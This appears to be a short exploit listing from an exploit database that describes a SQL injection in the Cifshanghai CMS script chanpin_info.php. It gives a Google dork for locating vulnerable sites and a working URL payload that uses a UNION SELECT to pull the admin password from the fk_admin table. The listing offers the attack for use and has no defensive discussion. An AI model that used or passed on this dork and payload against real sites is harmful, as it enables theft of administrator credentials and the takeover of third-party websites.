Cifshanghai (chanpin_info.php) CMS SQL Injection

2009-11-16T00:00:00
ID 1337DAY-ID-9986
Type zdt
Reporter ProF.Code
Modified 2009-11-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================
Cifshanghai (chanpin_info.php) CMS SQL Injection
================================================

=====================================
| cifshanghai.com script The news (chanpin_info.php) by pass
=====================================
Author: ProF.Code
~~~~~~~~~~~~~~~~~~~~
dork(google) : "Powered by cifshanghai.com"
~~~~~~~~~~~~~~~~~~~~
demo: http://server/chanpin_info.php?showlei=&Leiid=&n=1&id=-177+union+select+1,password,3,4,5,6,7,8+from+fk_admin
user : admin
pass : From site :D



#  0day.today [2018-04-10]  #